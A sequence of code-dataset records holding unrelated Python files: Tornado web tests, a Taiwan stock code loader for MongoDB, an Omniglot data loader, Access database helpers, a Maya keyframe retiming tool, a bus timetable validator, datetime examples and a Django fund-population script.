tornado.ioloop.IOLoop.instance().run_sync(lambda: main(url))\n\ndef test_get_params():\n async def handler(req):\n return {'body': json.dumps(req['query'])}\n async def main(url):\n resp = await web.get(url, query={'foo': 'bar'})\n assert json.loads(resp['body']) == {'foo': 'bar'}\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n tornado.ioloop.IOLoop.instance().run_sync(lambda: main(url))\n\ndef test_post():\n async def handler(req):\n body = json.loads(req['body'])\n return {'code': body['num'] + 1}\n async def main(url):\n resp = await web.post(url, json.dumps({'num': 200}))\n assert resp['code'] == 201\n app = web.app([('/', {'post': handler})])\n with web.test(app) as url:\n tornado.ioloop.IOLoop.instance().run_sync(lambda: main(url))\n\ndef test_post_timeout():\n async def handler(req):\n await tornado.gen.sleep(1)\n return {'code': 200}\n async def main(url):\n resp = await web.post(url, '', timeout=.001)\n assert resp['code'] == 201\n app = web.app([('/', {'post': handler})])\n with web.test(app) as url:\n with pytest.raises(web.Timeout):\n tornado.ioloop.IOLoop.instance().run_sync(lambda: main(url))\n\ndef test_basic():\n async def handler(req):\n assert req['verb'] == 'get'\n return {'headers': {'foo': 'bar'},\n 'code': 200,\n 'body': 'ok'}\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url)\n assert resp['body'] == 'ok'\n assert resp['headers']['foo'] == 'bar'\n\ndef test_middleware():\n def middleware(old_handler):\n async def new_handler(req):\n req = util.dicts.merge(req, {'headers': {'asdf': ' [mod req]'}})\n resp = await old_handler(req)\n resp = util.dicts.merge(resp, {'body': resp['body'] + ' [mod resp]'})\n return resp\n return new_handler\n @middleware\n async def handler(req):\n return {'headers': {'foo': 'bar'},\n 'code': 200,\n 'body': 'ok' + req['headers']['asdf']}\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url)\n assert resp['body'] == 'ok [mod req] [mod resp]'\n\ndef test_url_params():\n async def handler(req):\n return {'code': 200,\n 'body': json.dumps(req['query'])}\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url + '/?asdf=123&foo=bar&foo=notbar&stuff')\n assert json.loads(resp['body']) == {'asdf': '123',\n 'foo': ['bar', 'notbar'],\n 'stuff': ''}\n\ndef test_url_kwargs():\n async def handler(req):\n return {'code': 200,\n 'body': json.dumps(req['kwargs']['foo'])}\n app = web.app([('/:foo/stuff', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url + '/something/stuff')\n assert json.loads(resp['body']) == 'something', resp\n\ndef test_url_args():\n async def handler(req):\n return {'code': 200,\n 'body': json.dumps(req['args'])}\n app = web.app([('/(.*)/(.*)', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url + '/something/stuff')\n assert json.loads(resp['body']) == ['something', 'stuff'], resp\n\ndef test_validate():\n async def handler(req):\n return {'code': 200,\n 'body': json.dumps(req['query'])}\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url + '/?asdf=123&foo=bar&foo=notbar&stuff')\n assert json.loads(resp['body']) == {'asdf': '123',\n 'foo': ['bar', 'notbar'],\n 'stuff': ''}\n","sub_path":"tests/test_web.py","file_name":"test_web.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"513113299","text":"import twstock\r\nimport pymongo\r\nimport time\r\n\r\n#http://www.tej.com.tw/webtej/doc/wind1.htm\r\nformat = {'水泥工業' :'01', '食品工業' : '02', '塑膠工業' :'03'\r\n , '紡織纖維' :'04', '電機機械' : '05', '電器電纜' :'06'\r\n , '玻璃陶瓷' :'08', '造紙工業' : '09', '鋼鐵工業' :'10'\r\n , '橡膠工業' :'11', '汽車工業' : '12', '建材營造業' :'14'\r\n , '航運業' :'15', '觀光事業' : '16', '金融保險業' :'17'\r\n , '貿易百貨業' :'18', '綜合' : '19', '其他業' :'20'\r\n , '化學工業' :'21', '生技醫療業' : '22', '油電燃氣業' :'23'\r\n , '半導體業' :'24', '電腦及週邊設備業': '25', '光電業' : '26'\r\n , '通信網路業' :'27', '電子零組件業' : '28', '電子通路業' :'29'\r\n , '資訊服務業' :'30', '其他電子業' : '31', '文化創意業' :'32'\r\n , '農業科技業' :'33', '電子商務' : '34', '管理股票' :'80'\r\n , 'OTHER':'00'}\r\n\r\nclient = pymongo.MongoClient(\"mongodb://172.18.0.2:27017\")\r\n#client = pymongo.MongoClient(\"mongodb://192.168.1.5:27017\")\r\ndb = client[\"twStock\"] \r\ndb.authenticate(\"twstock\", \"twstock123\")\r\ncollTPEX = db[\"TPEX\"]\r\ncollTWSE = db[\"TWSE\"]\r\ntwstock.__update_codes()\r\ncollTPEX.delete_many({})\r\ncollTWSE.delete_many({})\r\n\"\"\"\r\n$group : {\r\n $code : {\r\n 'type' : $type\r\n ,'name' : $namme\r\n ,'ISIN' : $ISIN\r\n ,'start' : $start\r\n ,'market' : $market\r\n ,'CFI' : $CFI\r\n }\r\n}\r\n\"\"\"\r\n#取得TPEX\r\n#tpexG = {}\r\nfor k,v in twstock.tpex.items():\r\n groupN = \"\"\r\n if v.group == \"\":\r\n groupN = \"OTHER\"\r\n else:\r\n groupN = v.group\r\n \r\n data = {\r\n 'group' : groupN\r\n ,'code' : v.code\r\n ,'type' : v.type\r\n ,'groupCode' : format[groupN]\r\n ,'name' : v.name\r\n ,'ISIN' : v.ISIN\r\n ,'start' : v.start\r\n ,'market' : v.market\r\n ,'CFI' : v.CFI \r\n }\r\n collTPEX.insert_one(data)\r\n \"\"\"\r\n if groupN in tpexG:\r\n tpexG[groupN].update(data)\r\n else:\r\n tpexG[groupN] = data\r\n \"\"\"\r\n\r\n#取得TWSE\r\n#twseG = {}\r\nfor k,v in twstock.twse.items():\r\n groupN = \"\"\r\n if v.group == \"\":\r\n groupN = \"OTHER\"\r\n else:\r\n groupN = v.group\r\n \r\n data = {\r\n 'group' : groupN\r\n ,'code' : v.code\r\n ,'type' : v.type\r\n ,'groupCode' : format[groupN]\r\n ,'name' : v.name\r\n ,'ISIN' : v.ISIN\r\n ,'start' : v.start\r\n ,'market' : v.market\r\n ,'CFI' : v.CFI\r\n }\r\n collTWSE.insert_one(data)\r\n \"\"\"\r\n if groupN in twseG:\r\n twseG[groupN].update(data)\r\n else:\r\n twseG[groupN] = data\r\n \"\"\"\r\n#collTWSE.insert_one(twseG)\r\n#for k,v in twstock.tpex.items():\r\n# print(k)\r\n#print(twstock.tpex[\"1240\"].type)\r\n#v = twstock.tpex[\"1240\"]\r\n#print(v)","sub_path":"app/TPEX_TWSE_upCode.py","file_name":"TPEX_TWSE_upCode.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"294152963","text":"import numpy as np\nimport paddle\nimport paddle.fluid as fluid\nimport pickle as pkl\nfrom PIL import Image\nimport os\nimport glob\nimport csv\nimport random\n\nclass LoadData():\n def __init__(self,mode):\n self.mode = mode\n self.datafile = 'data/omniglot/data/'\n print('loading omniglot dataset from {} ......'.format(self.datafile))\n if self.mode == 'train':\n character_folders = [[os.path.join(self.datafile, family, character)] \\\n for family in os.listdir(self.datafile) \\\n if os.path.isdir(os.path.join(self.datafile, family)) \\\n for character in os.listdir(os.path.join(self.datafile, family))]\n random.shuffle(character_folders)\n character_folders_train = character_folders[:1200]\n character_folders_val = character_folders[1200:1300]\n character_folders_test = character_folders[1300:-1]\n with open('data/omniglot/train.csv','w') as file:\n wr = csv.writer(file)\n wr.writerows(character_folders_train)\n with open('data/omniglot/val.csv','w') as file:\n wr = csv.writer(file)\n wr.writerows(character_folders_val)\n with open('data/omniglot/test.csv','w') as file:\n wr = csv.writer(file)\n wr.writerows(character_folders_test) \n\n csv_path = 'data/omniglot/' + self.mode + '.csv'\n lines = [x.strip() for x in open(csv_path, 'r').readlines()]\n data = []\n labels = []\n rotate_angles = [0,90,180,270]\n label_index = 0\n for x in lines:\n class_names = glob.glob(os.path.join(x, '*'))\n for angle in rotate_angles:\n class_imgs = [np.asarray(Image.open(file).rotate(angle)) for file in class_names]\n class_labels = [label_index for _ in range(len(class_imgs))]\n data += class_imgs\n labels += class_labels\n label_index += 1\n self.n_classes = label_index\n self.data = data\n self.label = np.array(labels)\n print('omniglot dataset {} load done'.format(self.mode))\n\n def __getitem__(self, index):\n images = np.stack([self.data[i] for i in index])\n label = np.stack([self.label[i] for i in index])\n imgs = np.expand_dims(images, axis=1)\n return imgs, label\n\n\n\n\n","sub_path":"CV/PaddleFSL/dataloader/omniglot.py","file_name":"omniglot.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"636158288","text":"__author__ = 'Мирослава'\n'''\nФункції для доступу до даних з таблиць в базі даних Access\n'''\n\nimport pypyodbc\nimport os.path\n\npypyodbc.lowercase = False\n\ndef mdbTableList(cursor):\n # повертає список таблиць і запитів у базі даних\n tab = cursor.tables()\n tableList = []\n queryList = []\n for t in tab:\n if t[3] == \"TABLE\": tableList.append(t[2])\n if t[3] == \"VIEW\" : queryList.append(t[2])\n return tableList, queryList\n\ndef mdbColumnList(cursor, table):\n # повертає список найменувань полів у таблиці у базі даних\n col = cursor.columns(table=table)\n columnList = []\n for c in col:\n columnList.append(c[3])\n return columnList\n\ndef mdbColumnParameters(cursor, table, column):\n # повертає кортеж параметрів обраної колонки\n col = cursor.columns(table=table, column=column)\n l = list(col)\n t = l[0]\n return t\n\ndef rowAttributes(row):\n # повертає словник: {columnName: n},\n # де n - номер елемента в кортежі row,\n # який відповідає колонці з назвою columnName\n coldict = {}\n # також повертає список тих же columnname\n # (сортований на відміну від словника)\n collist = []\n for i in range(len(row.cursor_description)):\n columnName = row.cursor_description[i][0]\n collist.append(columnName)\n coldict[columnName] = i\n return coldict, collist\n\ndef allfieldnamesprint(cursor):\n print('-'*50)\n print('ДРУК НАЗВ КОЛОНОК ВСІХ ТАБЛИЦЬ У БАЗІ ДАНИХ access:')\n tableList, queryList = mdbTableList(cursor)\n for table in tableList:\n print('-'*50)\n print('table=', table)\n print('-'*50)\n columnList = mdbColumnList(cursor, table)\n for column in columnList:\n columnParameters = mdbColumnParameters(cursor, table, column)\n s = '\"%s\"' % columnParameters[3]\n print(': %-40s' % s)\n\ndef get_mdb_connection(mdbfilepath):\n pypyodbc.lowercase = False\n connection = pypyodbc.win_connect_mdb(mdbfilepath)\n return connection\n\ndef close_mdb_connection(connection):\n # connection.cursor.close()\n connection.commit()\n connection.close()\n\ndef mdb_investigation(mdbfilepath):\n # Досліджує невідому mdb\n connection = get_mdb_connection(mdbfilepath)\n cursor = connection.cursor()\n allfieldnamesprint(cursor)\n print('-'*50)\n close_mdb_connection(connection)\n\ndef all_data_print_from_mdb(mdbfilepath, tableName):\n # друкує всі дані з таблиці mdb\n connection = get_mdb_connection(mdbfilepath)\n cursor = connection.cursor()\n fields = \"*\"\n condition = \"\"\n sqlcommand = \"SELECT %s FROM %s %s\" % (fields, tableName, condition)\n cursor.execute(sqlcommand)\n\n print('-'*50)\n attr = False\n while True:\n row = cursor.fetchone()\n if not row: break\n print('row=', row)\n if not attr:\n attr = True\n coldict, collist = rowAttributes(row)\n # print(coldict)\n # print(collist)\n print('-'*50)\n # input()\n\n print('-'*50)\n\n close_mdb_connection(connection)\n\n\n\nif __name__ == '__main__':\n\n # mdbfiledir = 'c:/PyPrograms/PyRoman/mdbaccess/'\n # mdbfilename = 'Список Кооперативу Example.mdb'\n # mdbfilepath = mdbfiledir + mdbfilename\n mdbfiledir = r'D:\\Файли з Lenovo\\Роман\\Кооп Пасічний\\1с Кооп 2013 11 30\\Db-Koop'\n mdbfilename = r'1c Кооп 2013 11 30 Access.accdb'\n mdbfilepath = os.path.join(mdbfiledir, mdbfilename)\n print(mdbfilepath)\n\n mdb_investigation(mdbfilepath)\n","sub_path":"mdbaccess.py","file_name":"mdbaccess.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"327741449","text":"import traceback\r\nimport maya.OpenMaya as om\r\n\r\nfrom PySide2 import QtCore\r\nfrom PySide2.QtCore import Qt\r\nfrom PySide2 import QtWidgets\r\nfrom PySide2.QtWidgets import *\r\nfrom shiboken2 import wrapInstance\r\n\r\nimport maya.cmds as cmds\r\nimport maya.mel as mel\r\nimport maya.OpenMayaUI as omui\r\nimport pymel.core as pmc\r\n\r\n\r\nclass RetimingUtils(object):\r\n\r\n @classmethod\r\n def retime_keys(cls, retime_value, incremental, move_to_next, move_to_start):\r\n range_start_time, range_end_time = cls.get_selected_range()\r\n start_keyframe_time = cls.get_start_keyframe_time(range_start_time)\r\n last_keyframe_time = cls.get_last_keyframe_time()\r\n current_time = start_keyframe_time\r\n\r\n new_keyframe_times = [start_keyframe_time]\r\n\r\n while current_time != last_keyframe_time:\r\n next_keyframe_time = cls.find_keyframe(\"next\", current_time)\r\n\r\n if incremental:\r\n time_diff = next_keyframe_time - current_time\r\n if current_time < range_end_time:\r\n time_diff += retime_value\r\n if time_diff < 1:\r\n time_diff = 1\r\n else:\r\n if current_time < range_end_time:\r\n time_diff = retime_value\r\n else:\r\n time_diff = next_keyframe_time - current_time\r\n\r\n new_keyframe_times.append(new_keyframe_times[-1] + time_diff)\r\n current_time = next_keyframe_time\r\n\r\n if len(new_keyframe_times) > 1:\r\n cls.retime_keys_recursive(start_keyframe_time, 0, new_keyframe_times)\r\n\r\n first_keyframe_time = cls.find_keyframe(\"first\")\r\n\r\n if move_to_next and range_start_time >= first_keyframe_time:\r\n next_keyframe_time = cls.find_keyframe(\"next\", start_keyframe_time)\r\n cls.set_current_time(next_keyframe_time)\r\n elif range_end_time > first_keyframe_time:\r\n cls.set_current_time(start_keyframe_time)\r\n else:\r\n cls.set_current_time(range_start_time)\r\n\r\n if move_to_start and range_start_time >= first_keyframe_time:\r\n first_keyframe_time = cls.find_keyframe(\"first\", start_keyframe_time)\r\n cls.set_current_time(first_keyframe_time)\r\n\r\n @classmethod\r\n def retime_keys_recursive(cls, current_time, index, new_keyframe_times):\r\n if index >= len(new_keyframe_times):\r\n return\r\n\r\n updated_keyframe_time = new_keyframe_times[index]\r\n next_keyframe_time = cls.find_keyframe(\"next\", current_time)\r\n\r\n if updated_keyframe_time < next_keyframe_time:\r\n cls.change_keyframe_time(current_time, updated_keyframe_time)\r\n cls.retime_keys_recursive(next_keyframe_time, index + 1, new_keyframe_times)\r\n else:\r\n cls.retime_keys_recursive(next_keyframe_time, index + 1, new_keyframe_times)\r\n cls.change_keyframe_time(current_time, updated_keyframe_time)\r\n\r\n @classmethod\r\n def set_current_time(cls, time):\r\n cmds.currentTime(time)\r\n\r\n @classmethod\r\n def get_selected_range(cls):\r\n playback_slider = mel.eval(\"$tempVar = $gPlayBackSlider\")\r\n selected_range = cmds.timeControl(playback_slider, q=True, rangeArray=True)\r\n\r\n return selected_range\r\n\r\n @classmethod\r\n def find_keyframe(cls, which, time=None):\r\n kwargs = {\"which\": which}\r\n if which in [\"next\", \"previous\"]:\r\n kwargs[\"time\"] = (time, time)\r\n\r\n return cmds.findKeyframe(**kwargs)\r\n\r\n @classmethod\r\n def change_keyframe_time(cls, current_time, new_time):\r\n cmds.keyframe(e=True, time=(current_time, current_time), timeChange=new_time)\r\n\r\n @classmethod\r\n def get_start_keyframe_time(cls, range_start_time):\r\n start_times = cmds.keyframe(q=True, time=(range_start_time, range_start_time))\r\n if start_times:\r\n return start_times[0]\r\n\r\n start_time = cls.find_keyframe(\"previous\", range_start_time)\r\n return start_time\r\n\r\n @classmethod\r\n def get_first_keyframe_time(cls):\r\n return cls.find_keyframe(\"first\")\r\n\r\n @classmethod\r\n def get_last_keyframe_time(cls):\r\n return cls.find_keyframe(\"last\")\r\n\r\n\r\nclass RetimingUi(QtWidgets.QDialog):\r\n\r\n WINDOW_TITLE = \"Retiming Tool\"\r\n\r\n ABSOLUTE_BUTTON_WIDTH = 50\r\n RELATIVE_BUTTON_WIDTH = 64\r\n\r\n RETIMING_PROPERTY_NAME = \"retiming_data\"\r\n\r\n dlg_instance = None\r\n\r\n\r\n @classmethod\r\n def display(cls):\r\n if not cls.dlg_instance:\r\n cls.dlg_instance = RetimingUi()\r\n\r\n if cls.dlg_instance.isHidden():\r\n cls.dlg_instance.show()\r\n else:\r\n cls.dlg_instance.raise_()\r\n cls.dlg_instance.activateWindow()\r\n\r\n @classmethod\r\n def maya_main_window(cls):\r\n main_window_ptr = omui.MQtUtil.mainWindow()\r\n return wrapInstance(int(main_window_ptr), QtWidgets.QWidget)\r\n\r\n def __init__(self):\r\n super(RetimingUi, self).__init__(self.maya_main_window())\r\n\r\n self.setWindowTitle(\"Retiming Tool\")\r\n if cmds.about(ntOS=True):\r\n self.setWindowFlags(self.windowFlags() ^ QtCore.Qt.WindowContextHelpButtonHint)\r\n elif cmds.about(macOS=True):\r\n self.setWindowFlags(QtCore.Qt.Tool)\r\n\r\n self.create_widgets()\r\n self.create_layouts()\r\n self.create_connections()\r\n\r\n def create_widgets(self):\r\n self.title_lbl = QtWidgets.QLabel(\"Retiming Tool\")\r\n self.title_lbl.setStyleSheet(\"font: bold 50px\")\r\n self.absolute_buttons = []\r\n for i in range(1, 11):\r\n btn = QtWidgets.QPushButton(\"{0}f\".format(i))\r\n btn.setFixedWidth(self.ABSOLUTE_BUTTON_WIDTH)\r\n btn.setProperty(self.RETIMING_PROPERTY_NAME, [i, False])\r\n self.absolute_buttons.append(btn)\r\n self.relative_buttons = []\r\n for i in [-2, -1, 1, 2]:\r\n btn = QtWidgets.QPushButton(\"{0}f\".format(i))\r\n btn.setFixedWidth(self.RELATIVE_BUTTON_WIDTH)\r\n btn.setProperty(self.RETIMING_PROPERTY_NAME, [i, True])\r\n self.relative_buttons.append(btn)\r\n self.move_to_next_cb = QtWidgets.QCheckBox(\"Move to Next Frame\")\r\n self.move_to_start_cb = QtWidgets.QCheckBox(\"Move to Start\")\r\n self.ripple_delete_btn = QtWidgets.QPushButton(\"Ripple Delete\")\r\n self.cleanup_keys_btn = QtWidgets.QPushButton(\"Clean-Up Keys\")\r\n\r\n def create_layouts(self):\r\n absolute_retime_layout = QtWidgets.QHBoxLayout()\r\n absolute_retime_layout.setSpacing(2)\r\n for btn in self.absolute_buttons:\r\n absolute_retime_layout.addWidget(btn)\r\n\r\n relative_retime_layout = QtWidgets.QHBoxLayout()\r\n relative_retime_layout.setSpacing(2)\r\n for btn in self.relative_buttons:\r\n relative_retime_layout.addWidget(btn)\r\n if relative_retime_layout.count() == 2:\r\n relative_retime_layout.addStretch()\r\n\r\n main_layout = QtWidgets.QVBoxLayout(self)\r\n main_layout.setContentsMargins(2, 2, 2, 2)\r\n main_layout.setSpacing(2)\r\n main_layout.addLayout(absolute_retime_layout)\r\n main_layout.addLayout(relative_retime_layout)\r\n main_layout.addWidget(self.move_to_next_cb)\r\n main_layout.addWidget(self.move_to_start_cb)\r\n main_layout.addWidget(self.ripple_delete_btn)\r\n main_layout.addWidget(self.cleanup_keys_btn)\r\n\r\n\r\n def create_connections(self):\r\n for btn in self.absolute_buttons:\r\n btn.clicked.connect(self.retime)\r\n\r\n for btn in self.relative_buttons:\r\n btn.clicked.connect(self.retime)\r\n\r\n self.ripple_delete_btn.clicked.connect(self.ripple_delete)\r\n self.cleanup_keys_btn.clicked.connect(self.cleanup_keys)\r\n\r\n def retime(self):\r\n btn = self.sender()\r\n if btn:\r\n retiming_data = btn.property(self.RETIMING_PROPERTY_NAME)\r\n move_to_next = self.move_to_next_cb.isChecked()\r\n move_to_start = self.move_to_start_cb.isChecked()\r\n\r\n cmds.undoInfo(openChunk=True)\r\n try:\r\n RetimingUtils.retime_keys(retiming_data[0], retiming_data[1], move_to_next, move_to_start)\r\n except:\r\n traceback.print_exc()\r\n om.MGlobal.displayError(\"Retime error occurred. See script for details.\")\r\n\r\n cmds.undoInfo(closeChunk=True)\r\n\r\n def ripple_delete(self):\r\n selected_objects = pmc.selected()\r\n start_time, end_time = RetimingUtils.get_selected_range()\r\n cmds.cutKey(selected_objects, time=(start_time, end_time), clear=True)\r\n\r\n def cleanup_keys(self):\r\n selected_objects = pmc.selected()\r\n start_time, end_time = RetimingUtils.get_selected_range()\r\n cmds.snapKey(selected_objects, time=(start_time, end_time))\r\n","sub_path":"retimingtool.py","file_name":"retimingtool.py","file_ext":"py","file_size_in_byte":8843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103857753","text":"import re\nimport json\nfrom datetime import datetime\nfrom typing import Dict, List\n\n\nclass TimetableUnit:\n def __init__(self, info: dict):\n self.bus_id: bool = type(info[\"bus_id\"]) is int\n self.stop_id: bool = type(info[\"stop_id\"]) is int\n self.stop_name = (\n lambda s: True if re.match(r'^[A-Z][A-Za-z ]+ (Road|Avenue|Boulevard|Street)$', s) is not None else False)(\n info[\"stop_name\"])\n self.next_stop: bool = type(info[\"next_stop\"]) is int and info[\"next_stop\"] is not None\n self.stop_type = (lambda s: True if re.match(r'^[SOF]$|^$', s) is not None else False)(info[\"stop_type\"])\n self.a_time = (lambda s: True if re.match(r'^(0[1-9]|1[0-9]|2[0-3]):[0-5][0-9]$', s) is not None else False)(\n info[\"a_time\"])\n\n\ndef sum_errors(string):\n table_of_errors = {\"stop_name\": 0,\n \"stop_type\": 0,\n \"a_time\": 0}\n for unit in json.loads(string):\n new_part = TimetableUnit(unit)\n for key, value in new_part.__dict__.items():\n if value is False:\n try:\n table_of_errors[key] += 1\n except KeyError:\n table_of_errors[key] = 1\n return table_of_errors\n\n\ndef syntax_correct(string) -> bool:\n sum_of_errors = sum(sum_errors(string).values())\n print(f'Format validation: {sum_of_errors} errors')\n for key, value in sum_errors(string).items():\n print(f'{key}: {value}')\n return sum_of_errors == 0\n\n\nclass BusStop:\n def __init__(self, info: dict):\n self.lines = []\n self.lines.append(info[\"bus_id\"])\n self.stop_id = info[\"stop_id\"]\n self.stop_name = info[\"stop_name\"]\n self.is_start = info[\"stop_type\"] == 'S'\n self.is_finnish = info[\"stop_type\"] == 'F'\n self.is_on_demand = info[\"stop_type\"] == 'O'\n\n def update(self, other):\n self.lines += other.lines\n self.is_start = self.is_start or other.is_start\n self.is_finnish = self.is_finnish or other.is_finnish\n self.is_on_demand = self.is_on_demand or other.is_on_demand\n\n\nclass Stop:\n def __init__(self, id, name, time, next_stop):\n self.id = id\n self.name = name\n self.time = time\n self.next_stop = next_stop\n\n\nclass BusLine:\n def __init__(self, info: dict):\n self.line_nr = info[\"bus_id\"]\n self.start = info[\"stop_id\"] if info[\"stop_type\"] == 'S' else ''\n self.finnish = info[\"stop_id\"] if info[\"stop_type\"] == 'F' else ''\n self.num_of_stops = 1\n self.stops = {}\n self.stops.update({info[\"stop_id\"]: Stop(info[\"stop_id\"], info[\"stop_name\"],\n datetime.strptime(info[\"a_time\"], '%H:%M'), info[\"next_stop\"])})\n\n def udpate_line(self, other: dict):\n if self.start == '' and other[\"stop_type\"] == 'S':\n self.start = other[\"stop_id\"]\n if self.finnish == '' and other[\"stop_type\"] == 'F':\n self.finnish = other[\"stop_id\"]\n self.num_of_stops += 1\n self.stops.update({other[\"stop_id\"]: Stop(other[\"stop_id\"],\n other[\"stop_name\"], datetime.strptime(other[\"a_time\"], '%H:%M'),\n other[\"next_stop\"])})\n\n def show_all(self):\n for key, value in self.__dict__.items():\n print(key, value)\n\n def check_data(self):\n return self.start != '' and self.finnish != ''\n\n\ndef create_stop_dict(string):\n stops = {}\n for unit in json.loads(string):\n new_part = BusStop(unit)\n if new_part.stop_name in stops:\n stops[new_part.stop_name].update(new_part)\n else:\n stops[new_part.stop_name] = new_part\n return stops\n\n\ndef create_line_dict(string):\n lines = {}\n for unit in json.loads(string):\n new_part = BusLine(unit)\n if new_part.line_nr in lines:\n lines[new_part.line_nr].udpate_line(unit)\n else:\n lines[new_part.line_nr] = new_part\n return lines\n\n\ndef get_statistics(BusStop_dict: Dict[str, BusStop]):\n table = {\n \"Start stops\": [], \"Transfer stops\": [], \"Finish stops\": []\n }\n for name, stop in BusStop_dict.items():\n if stop.is_start:\n table[\"Start stops\"].append(name)\n if stop.is_finnish:\n table[\"Finish stops\"].append(name)\n if len(stop.lines) > 1:\n table[\"Transfer stops\"].append(name)\n\n for key, content in table.items():\n print(f'{key}: {len(content)} {sorted(content)}')\n\n\ndef get_invalid_stops(BusStop_dict: Dict[str, BusStop]):\n print('On demand stops test:')\n errors = 0\n wrong_stop_type = []\n for name, stop in BusStop_dict.items():\n if (stop.is_start or stop.is_finnish or len(stop.lines) > 1) and stop.is_on_demand:\n wrong_stop_type.append(stop.stop_name)\n errors += 1\n if errors > 0:\n print(f'Wrong stop type: {sorted(wrong_stop_type)}')\n else:\n print(\"OK\")\n\n\ndef arrival_time_test(string):\n print('Arrival time test:')\n errors = 0\n bus_lines = create_line_dict(string)\n for nr, line in bus_lines.items():\n prev_stop = line.stops[line.start]\n current_stop = line.stops[line.stops[line.start].next_stop]\n while current_stop != line.finnish:\n if current_stop.time < prev_stop.time:\n errors += 1\n print(f'bus_id line {nr}: wrong time on station {current_stop.name}')\n break\n try:\n prev_stop = current_stop\n current_stop = line.stops[current_stop.next_stop]\n except KeyError:\n break\n if not errors:\n print(\"OK\")\n","sub_path":"data_check.py","file_name":"data_check.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"339634426","text":"#\n# 10814번: 나이순 정렬\n# https://www.acmicpc.net/problem/10814\n# Version: Python 3.9.7\n#\n# Created by WhiteHyun on 2022/01/25.\n#\n\n\nfrom sys import stdin\n\nread = stdin.readline\n\nif __name__ == \"__main__\":\n sorted_list = sorted(\n [read().rstrip().split() for _ in range(int(read()))], key=lambda x: int(x[0]),\n )\n for value in sorted_list:\n print(*value)\n","sub_path":"boj/silver5/10814.py","file_name":"10814.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"548582303","text":"import os, json, django\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'delta_hedge.settings')\n\ndjango.setup()\n#Populating Script for Fund Names and their respective CIK Numbers\nfrom search.models import Fund\n\ndef add_fund(name, cik):\n t = Fund.objects.create(fund_name=name, cik_num=cik, last_update=\"1900Q1\")\n t.save()\n\ndef get_funds_to_populate():\n with open('raw_13F_CIK_and_Name_List.txt') as rawFile:\n fundData = json.load(rawFile)\n\n for thing in fundData['cikData']:\n add_fund(thing['name'], int(thing['cik']))\n\nif __name__ == '__main__':\n Fund.objects.all().delete()\n get_funds_to_populate()","sub_path":"script_payload/populate_cik.py","file_name":"populate_cik.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"465713886","text":"#!/usr/bin/env python\r\n\r\nfrom datetime import timedelta\r\n\r\na = timedelta(days=2, hours=6)\r\nb = timedelta(hours=4.5)\r\nc = a + b\r\nprint (c) #->2 days, 10:30:00\r\nprint (c.days) #->2\r\nprint (c.seconds) #->37800\r\nprint (c.seconds / 3600) #->10.5\r\nprint (c.total_seconds()/ 3600) #->58.5\r\n\r\n\r\n\r\nfrom datetime import datetime\r\na = datetime(2017, 1, 17)\r\n#加多少天\r\nprint (a + timedelta(days=22))\r\n\r\n#减多少天\r\nprint (a + timedelta(days=-22))\r\n\r\nnow = datetime.today()\r\nprint (now)\r\nprint(now + timedelta(minutes=10))\r\n\r\n# datetime 会自动处理闰年\r\na = datetime(2012, 3, 1)\r\nb = datetime(2012, 2, 28)\r\nprint (a - b) \r\n\r\n\r\n\"\"\"\r\ndateutil 模块\r\n\t执行更加复杂的日期操作。\r\n\"\"\"\r\n\r\n\r\nfrom datetime import datetime, timedelta\r\nweekdays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday',\r\n\t'Friday', 'Saturday', 'Sunday']\r\n\r\ndef get_previous_byday(dayname, start_date=None):\r\n\tif start_date is None:\r\n\t\tstart_date = datetime.today()\r\n\t#星期一索引为0\r\n\tday_num = start_date.weekday()\r\n\tday_num_target = weekdays.index(dayname)\r\n\tdays_ago = (7 + day_num - day_num_target) % 7\r\n\tif days_ago == 0:\r\n\t\tdays_ago = 7\r\n\ttarget_date = start_date - timedelta(days=days_ago)\r\n\treturn target_date\r\n\r\nprint (get_previous_byday('Monday'))\r\n\r\n\r\n\r\nfrom datetime import datetime, date, timedelta\r\nimport calendar\r\n\r\ndef get_month_range(start_date=None):\r\n\tif start_date is None:\r\n\t\tstart_date = date.today().replace(day=1)\r\n\t\t\r\n\t\t#monthrange 找到改月的总天数\r\n\t_, days_in_month = calendar.monthrange(start_date.year, start_date.month)\r\n\tend_date = start_date + timedelta(days=days_in_month)\r\n\treturn (start_date, end_date)\r\n\r\nfrist_day, last_day = get_month_range()\r\nprint(frist_day)\r\nprint(last_day)\r\n\r\na_day = timedelta(days=1)\r\nwhile frist_day < last_day:\r\n\tprint(frist_day)\r\n\tfrist_day += a_day\r\n\r\n","sub_path":"third_selection/learn_data_date_time_datetime.py","file_name":"learn_data_date_time_datetime.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"575586497","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef plot_bargraph(title, x_label, y_label, x_attribute, y_attribute):\n plt.subplots(figsize=(19, 10))\n plt.title(title)\n graph = 